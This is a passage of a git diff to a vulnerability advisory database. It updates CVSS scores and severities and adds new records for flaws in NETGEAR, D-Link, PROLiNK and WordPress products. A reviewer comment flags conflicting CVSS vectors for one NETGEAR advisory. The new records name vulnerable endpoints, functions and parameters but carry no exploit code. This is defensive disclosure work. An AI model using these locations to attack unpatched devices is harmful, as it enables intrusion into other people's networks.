--- a/advisories/unreviewed/2025/12/GHSA-qqrg-hpxx-mmvw/GHSA-qqrg-hpxx-mmvw.json
+++ b/advisories/unreviewed/2025/12/GHSA-qqrg-hpxx-mmvw/GHSA-qqrg-hpxx-mmvw.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qqrg-hpxx-mmvw",
- "modified": "2025-12-18T06:30:13Z",
+ "modified": "2026-02-20T21:31:16Z",
 "published": "2025-12-18T06:30:13Z",
 "aliases": [
 "CVE-2025-68461"
@@ -26,6 +26,10 @@
 {
 "type": "WEB",
 "url": "https://roundcube.net/news/2025/12/13/security-updates-1.6.12-and-1.5.12"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-68461"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2026/01/GHSA-2vf2-f656-c2mm/GHSA-2vf2-f656-c2mm.json b/advisories/unreviewed/2026/01/GHSA-2vf2-f656-c2mm/GHSA-2vf2-f656-c2mm.json
index 3abf87ad4c9f4..66545575a40d5 100644
--- a/advisories/unreviewed/2026/01/GHSA-2vf2-f656-c2mm/GHSA-2vf2-f656-c2mm.json
+++ b/advisories/unreviewed/2026/01/GHSA-2vf2-f656-c2mm/GHSA-2vf2-f656-c2mm.json
@@ -1,13 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-2vf2-f656-c2mm",
- "modified": "2026-01-13T18:31:07Z",
+ "modified": "2026-02-20T21:31:16Z",
 "published": "2026-01-13T18:31:07Z",
 "aliases": [
 "CVE-2026-0406"
 ],
 "details": "An insufficient input validation vulnerability in the NETGEAR XR1000v2 \nallows attackers connected to the router's LAN to execute OS command \ninjections.",
 "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
 {
 "type": "CVSS_V4",
 "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:N/R:U/V:D/RE:M/U:Amber"
diff --git a/advisories/unreviewed/2026/01/GHSA-52xc-q9g5-mc6m/GHSA-52xc-q9g5-mc6m.json b/advisories/unreviewed/2026/01/GHSA-52xc-q9g5-mc6m/GHSA-52xc-q9g5-mc6m.json
index 3916424fa241a..419db72d2cd72 100644
--- a/advisories/unreviewed/2026/01/GHSA-52xc-q9g5-mc6m/GHSA-52xc-q9g5-mc6m.json
+++ b/advisories/unreviewed/2026/01/GHSA-52xc-q9g5-mc6m/GHSA-52xc-q9g5-mc6m.json
@@ -1,13 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-52xc-q9g5-mc6m",
- "modified": "2026-01-13T18:31:07Z",
+ "modified": "2026-02-20T21:31:16Z",
 "published": "2026-01-13T18:31:07Z",
 "aliases": [
 "CVE-2026-0403"
 ],
 "details": "An insufficient input validation vulnerability in NETGEAR Orbi routers \nallows attackers connected to the router's LAN to execute OS command \ninjections.",
 "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
 {
 "type": "CVSS_V4",
 "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:D/RE:M/U:Amber"
diff --git a/advisories/unreviewed/2026/01/GHSA-56jh-3q9p-9x3q/GHSA-56jh-3q9p-9x3q.json b/advisories/unreviewed/2026/01/GHSA-56jh-3q9p-9x3q/GHSA-56jh-3q9p-9x3q.json
index 50d225a18688a..530a5dd20dfd8 100644
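Review bot: In GHSA-52xc-q9g5-mc6m (CVE-2026-0403) the added `CVSS_V3` entry scores `PR:L` with `C:H/I:H/A:H`, while the `CVSS_V4` entry kept directly below it in the same `severity` array says `PR:H/VC:N/VI:L/VA:N`, so the record now states two incompatible impacts for one flaw. The description (OS command injection from the LAN) reads closer to the V3 vector, which suggests the V4 vector is the stale one, but that cannot be settled from this hunk. Consumers that prioritise on one scoring version will triage this advisory very differently from those using the other; I would reconcile both vectors against the CNA and NVD records and, until then, treat the higher rating as the working one. The sibling NETGEAR records in this commit (GHSA-2vf2-f656-c2mm, GHSA-56jh-3q9p-9x3q, GHSA-rhrj-763h-99fq) do not show this split.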
--- a/advisories/unreviewed/2026/01/GHSA-56jh-3q9p-9x3q/GHSA-56jh-3q9p-9x3q.json
+++ b/advisories/unreviewed/2026/01/GHSA-56jh-3q9p-9x3q/GHSA-56jh-3q9p-9x3q.json
@@ -1,13 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-56jh-3q9p-9x3q",
- "modified": "2026-01-13T18:31:07Z",
+ "modified": "2026-02-20T21:31:17Z",
 "published": "2026-01-13T18:31:07Z",
 "aliases": [
 "CVE-2026-0407"
 ],
 "details": "An insufficient authentication vulnerability in NETGEAR WiFi range \nextenders allows a network adjacent attacker with WiFi authentication or\n a physical Ethernet port connection to bypass the authentication \nprocess and access the admin panel.",
 "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
 {
 "type": "CVSS_V4",
 "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:D/RE:M/U:Amber"
diff --git a/advisories/unreviewed/2026/01/GHSA-rhrj-763h-99fq/GHSA-rhrj-763h-99fq.json b/advisories/unreviewed/2026/01/GHSA-rhrj-763h-99fq/GHSA-rhrj-763h-99fq.json
index f7aa82b809c31..36b512ff97c8b 100644
--- a/advisories/unreviewed/2026/01/GHSA-rhrj-763h-99fq/GHSA-rhrj-763h-99fq.json
+++ b/advisories/unreviewed/2026/01/GHSA-rhrj-763h-99fq/GHSA-rhrj-763h-99fq.json
@@ -1,13 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-rhrj-763h-99fq",
- "modified": "2026-01-13T18:31:07Z",
+ "modified": "2026-02-20T21:31:17Z",
 "published": "2026-01-13T18:31:07Z",
 "aliases": [
 "CVE-2026-0408"
 ],
 "details": "A path traversal vulnerability in NETGEAR WiFi range extenders allows\n an attacker with LAN authentication to access the router's IP and \nreview the contents of the dynamically generated webproc file, which \nrecords the username and password submitted to the router GUI.",
 "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
 {
 "type": "CVSS_V4",
 "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:D/RE:M/U:Amber"
diff --git a/advisories/unreviewed/2026/02/GHSA-343f-9rcg-8p42/GHSA-343f-9rcg-8p42.json b/advisories/unreviewed/2026/02/GHSA-343f-9rcg-8p42/GHSA-343f-9rcg-8p42.json
index 0fd2b97c7be9c..4a2046d7f94a9 100644
--- a/advisories/unreviewed/2026/02/GHSA-343f-9rcg-8p42/GHSA-343f-9rcg-8p42.json
+++ b/advisories/unreviewed/2026/02/GHSA-343f-9rcg-8p42/GHSA-343f-9rcg-8p42.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-343f-9rcg-8p42",
- "modified": "2026-02-20T18:31:38Z",
+ "modified": "2026-02-20T21:31:22Z",
 "published": "2026-02-20T18:31:38Z",
 "aliases": [
 "CVE-2026-24941"
 ],
 "details": "Missing Authorization vulnerability in wpjobportal WP Job Portal wp-job-portal allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Job Portal: from n/a through <= 2.4.4.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-862"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:38Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-3685-fgwv-ffhc/GHSA-3685-fgwv-ffhc.json b/advisories/unreviewed/2026/02/GHSA-3685-fgwv-ffhc/GHSA-3685-fgwv-ffhc.json
new file mode 100644
index 0000000000000..e59dcf9a0be20
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-3685-fgwv-ffhc/GHSA-3685-fgwv-ffhc.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3685-fgwv-ffhc",
+ "modified": "2026-02-20T21:31:24Z",
+ "published": "2026-02-20T21:31:24Z",
+ "aliases": [
+ "CVE-2026-2854"
+ ],
+ "details": "A flaw has been found in D-Link DWR-M960 1.01.07. This impacts the function sub_4611CC of the file /boafrm/formNtp of the component NTP Configuration Endpoint. Executing a manipulation of the argument submit-url can lead to stack-based buffer overflow. The attack can be launched remotely. The exploit has been published and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2854"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/LX-66-LX/cve-new/issues/11"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347093"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347093"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754457"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dlink.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T20:25:25Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-3822-8jq8-pqhh/GHSA-3822-8jq8-pqhh.json b/advisories/unreviewed/2026/02/GHSA-3822-8jq8-pqhh/GHSA-3822-8jq8-pqhh.json
index c25386e35d60d..34bc4cf90133d 100644
--- a/advisories/unreviewed/2026/02/GHSA-3822-8jq8-pqhh/GHSA-3822-8jq8-pqhh.json
+++ b/advisories/unreviewed/2026/02/GHSA-3822-8jq8-pqhh/GHSA-3822-8jq8-pqhh.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3822-8jq8-pqhh",
- "modified": "2026-02-19T18:31:54Z",
+ "modified": "2026-02-20T21:31:21Z",
 "published": "2026-02-19T18:31:54Z",
 "aliases": [
 "CVE-2025-15562"
 ],
 "details": "The server API endpoint /report/internet/urls reflects received data into the HTML response without applying proper encoding or filtering. This allows an attacker to execute arbitrary JavaScript in the victim's browser if the victim opens a URL prepared by the attacker.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T11:15:56Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-3g7r-h8fj-xc5g/GHSA-3g7r-h8fj-xc5g.json b/advisories/unreviewed/2026/02/GHSA-3g7r-h8fj-xc5g/GHSA-3g7r-h8fj-xc5g.json
index 1df04f7de316b..35b53ce9ffe1a 100644
--- a/advisories/unreviewed/2026/02/GHSA-3g7r-h8fj-xc5g/GHSA-3g7r-h8fj-xc5g.json
+++ b/advisories/unreviewed/2026/02/GHSA-3g7r-h8fj-xc5g/GHSA-3g7r-h8fj-xc5g.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3g7r-h8fj-xc5g",
- "modified": "2026-02-20T18:31:38Z",
+ "modified": "2026-02-20T21:31:22Z",
 "published": "2026-02-20T18:31:38Z",
 "aliases": [
 "CVE-2026-22378"
 ],
 "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Blabber blabber allows PHP Local File Inclusion.This issue affects Blabber: from n/a through <= 1.7.0.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-98"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:37Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-43ww-vg8r-97hv/GHSA-43ww-vg8r-97hv.json b/advisories/unreviewed/2026/02/GHSA-43ww-vg8r-97hv/GHSA-43ww-vg8r-97hv.json
index 0d4372d3c8b9d..85d0a52698109 100644
--- a/advisories/unreviewed/2026/02/GHSA-43ww-vg8r-97hv/GHSA-43ww-vg8r-97hv.json
+++ b/advisories/unreviewed/2026/02/GHSA-43ww-vg8r-97hv/GHSA-43ww-vg8r-97hv.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-43ww-vg8r-97hv",
- "modified": "2026-02-20T18:31:38Z",
+ "modified": "2026-02-20T21:31:22Z",
 "published": "2026-02-20T18:31:38Z",
 "aliases": [
 "CVE-2026-22374"
 ],
 "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Zio Alberto zioalberto allows PHP Local File Inclusion.This issue affects Zio Alberto: from n/a through <= 1.2.2.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-98"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:36Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-5fgx-x2mx-c652/GHSA-5fgx-x2mx-c652.json b/advisories/unreviewed/2026/02/GHSA-5fgx-x2mx-c652/GHSA-5fgx-x2mx-c652.json
index 5093e5f59ce89..142ad8603f80a 100644
--- a/advisories/unreviewed/2026/02/GHSA-5fgx-x2mx-c652/GHSA-5fgx-x2mx-c652.json
+++ b/advisories/unreviewed/2026/02/GHSA-5fgx-x2mx-c652/GHSA-5fgx-x2mx-c652.json
@@ -42,7 +42,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-74"
+ "CWE-74",
+ "CWE-77"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2026/02/GHSA-5mq8-87c9-qfhc/GHSA-5mq8-87c9-qfhc.json b/advisories/unreviewed/2026/02/GHSA-5mq8-87c9-qfhc/GHSA-5mq8-87c9-qfhc.json
new file mode 100644
index 0000000000000..9c3afc7d0e8a1
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5mq8-87c9-qfhc/GHSA-5mq8-87c9-qfhc.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5mq8-87c9-qfhc",
+ "modified": "2026-02-20T21:31:24Z",
+ "published": "2026-02-20T21:31:24Z",
+ "aliases": [
+ "CVE-2026-2857"
+ ],
+ "details": "A vulnerability was determined in D-Link DWR-M960 1.01.07. Affected by this issue is the function sub_423E00 of the file /boafrm/formPortFw of the component Port Forwarding Configuration Endpoint. This manipulation of the argument submit-url causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2857"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/LX-66-LX/cve-new/issues/14"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347096"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347096"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754476"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dlink.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T21:19:30Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5vrw-6f4h-227q/GHSA-5vrw-6f4h-227q.json b/advisories/unreviewed/2026/02/GHSA-5vrw-6f4h-227q/GHSA-5vrw-6f4h-227q.json
index ae2acc36b4efb..d1011829c1247 100644
--- a/advisories/unreviewed/2026/02/GHSA-5vrw-6f4h-227q/GHSA-5vrw-6f4h-227q.json
+++ b/advisories/unreviewed/2026/02/GHSA-5vrw-6f4h-227q/GHSA-5vrw-6f4h-227q.json
@@ -1,13 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-5vrw-6f4h-227q",
- "modified": "2026-02-11T03:30:18Z",
+ "modified": "2026-02-20T21:31:20Z",
 "published": "2026-02-11T03:30:18Z",
 "aliases": [
 "CVE-2026-1571"
 ],
 "details": "User-controlled input is reflected into the HTML output without proper encoding on TP-Link Archer C60 v3, allowing arbitrary JavaScript execution via a crafted URL. An attacker could run script in the device web UI context, potentially enabling credential theft, session hijacking, or unintended actions if a privileged user is targeted.",
 "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ },
 {
 "type": "CVSS_V4",
 "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
diff --git a/advisories/unreviewed/2026/02/GHSA-5xcj-44v8-p2v3/GHSA-5xcj-44v8-p2v3.json b/advisories/unreviewed/2026/02/GHSA-5xcj-44v8-p2v3/GHSA-5xcj-44v8-p2v3.json
index 12920820315dd..ff14490e4866b 100644
--- a/advisories/unreviewed/2026/02/GHSA-5xcj-44v8-p2v3/GHSA-5xcj-44v8-p2v3.json
+++ b/advisories/unreviewed/2026/02/GHSA-5xcj-44v8-p2v3/GHSA-5xcj-44v8-p2v3.json
@@ -46,7 +46,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-74"
+ "CWE-74",
+ "CWE-89"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2026/02/GHSA-6262-6vhm-9x8v/GHSA-6262-6vhm-9x8v.json b/advisories/unreviewed/2026/02/GHSA-6262-6vhm-9x8v/GHSA-6262-6vhm-9x8v.json
index fcd99fa694ca1..56f024acf0f1a 100644
--- a/advisories/unreviewed/2026/02/GHSA-6262-6vhm-9x8v/GHSA-6262-6vhm-9x8v.json
+++ b/advisories/unreviewed/2026/02/GHSA-6262-6vhm-9x8v/GHSA-6262-6vhm-9x8v.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-6262-6vhm-9x8v",
- "modified": "2026-02-20T18:31:39Z",
+ "modified": "2026-02-20T21:31:23Z",
 "published": "2026-02-20T18:31:39Z",
 "aliases": [
 "CVE-2026-24948"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in fox-themes Reflector reflector-plugins allows Reflected XSS.This issue affects Reflector: from n/a through <= 1.2.2.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:39Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-62hw-x3qq-c7vv/GHSA-62hw-x3qq-c7vv.json b/advisories/unreviewed/2026/02/GHSA-62hw-x3qq-c7vv/GHSA-62hw-x3qq-c7vv.json
index 1ba5359ab6e42..fe0b21585aa6c 100644
--- a/advisories/unreviewed/2026/02/GHSA-62hw-x3qq-c7vv/GHSA-62hw-x3qq-c7vv.json
+++ b/advisories/unreviewed/2026/02/GHSA-62hw-x3qq-c7vv/GHSA-62hw-x3qq-c7vv.json
@@ -1,13 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-62hw-x3qq-c7vv",
- "modified": "2026-02-20T18:31:40Z",
+ "modified": "2026-02-20T21:31:23Z",
 "published": "2026-02-20T18:31:40Z",
 "aliases": [
 "CVE-2026-27506"
 ],
 "details": "SVXportal version 2.5 and prior contain a stored cross-site scripting vulnerability in the user profile update workflow (user_settings.php submitting to admin/update_user.php). Authenticated users can store malicious HTML/JavaScript in fields such as Firstname, lastname, email, and image_url, which are later rendered without adequate output encoding in the administrator interface (admin/users.php), resulting in JavaScript execution in an administrator's browser when the affected page is viewed.",
 "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ },
 {
 "type": "CVSS_V4",
 "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
diff --git a/advisories/unreviewed/2026/02/GHSA-68g8-2724-hq79/GHSA-68g8-2724-hq79.json b/advisories/unreviewed/2026/02/GHSA-68g8-2724-hq79/GHSA-68g8-2724-hq79.json
new file mode 100644
index 0000000000000..cd89edf42ca1a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-68g8-2724-hq79/GHSA-68g8-2724-hq79.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-68g8-2724-hq79",
+ "modified": "2026-02-20T21:31:23Z",
+ "published": "2026-02-20T21:31:23Z",
+ "aliases": [
+ "CVE-2021-35402"
+ ],
+ "details": "PROLiNK PRC2402M 20190909 before 2021-06-13 allows live_api.cgi?page=satellite_list OS command injection via shell metacharacters in the ip parameter (for satellite_status).",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-35402"
+ },
+ {
+ "type": "WEB",
+ "url": "https://starlabs.sg/advisories/21/21-35402"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T19:23:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-6wwj-pg79-rf37/GHSA-6wwj-pg79-rf37.json b/advisories/unreviewed/2026/02/GHSA-6wwj-pg79-rf37/GHSA-6wwj-pg79-rf37.json
index 3b2a346b5c526..4844c455e9f1e 100644
--- a/advisories/unreviewed/2026/02/GHSA-6wwj-pg79-rf37/GHSA-6wwj-pg79-rf37.json
+++ b/advisories/unreviewed/2026/02/GHSA-6wwj-pg79-rf37/GHSA-6wwj-pg79-rf37.json
@@ -42,7 +42,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-74"
+ "CWE-74",
+ "CWE-77"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2026/02/GHSA-79pg-4mv3-p2x9/GHSA-79pg-4mv3-p2x9.json b/advisories/unreviewed/2026/02/GHSA-79pg-4mv3-p2x9/GHSA-79pg-4mv3-p2x9.json
new file mode 100644
index 0000000000000..23e025eb44ea2
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-79pg-4mv3-p2x9/GHSA-79pg-4mv3-p2x9.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-79pg-4mv3-p2x9",
+ "modified": "2026-02-20T21:31:24Z",
+ "published": "2026-02-20T21:31:24Z",
+ "aliases": [
+ "CVE-2026-2855"
+ ],
+ "details": "A vulnerability has been found in D-Link DWR-M960 1.01.07. Affected is the function sub_4648F0 of the file /boafrm/formDdns of the component DDNS Settings Handler. The manipulation of the argument submit-url leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2855"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/LX-66-LX/cve-new/issues/12"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347094"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347094"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754458"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dlink.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T20:25:25Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-7qvf-m2xc-hg57/GHSA-7qvf-m2xc-hg57.json b/advisories/unreviewed/2026/02/GHSA-7qvf-m2xc-hg57/GHSA-7qvf-m2xc-hg57.json
index 6622c4bdb5a04..2f7df1a54d8b4 100644
--- a/advisories/unreviewed/2026/02/GHSA-7qvf-m2xc-hg57/GHSA-7qvf-m2xc-hg57.json
+++ b/advisories/unreviewed/2026/02/GHSA-7qvf-m2xc-hg57/GHSA-7qvf-m2xc-hg57.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-7qvf-m2xc-hg57",
- "modified": "2026-02-20T18:31:39Z",
+ "modified": "2026-02-20T21:31:23Z",
 "published": "2026-02-20T18:31:39Z",
 "aliases": [
 "CVE-2026-24944"
 ],
 "details": "Missing Authorization vulnerability in weDevs Subscribe2 subscribe2 allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Subscribe2: from n/a through <= 10.44.",
- "severity": [],
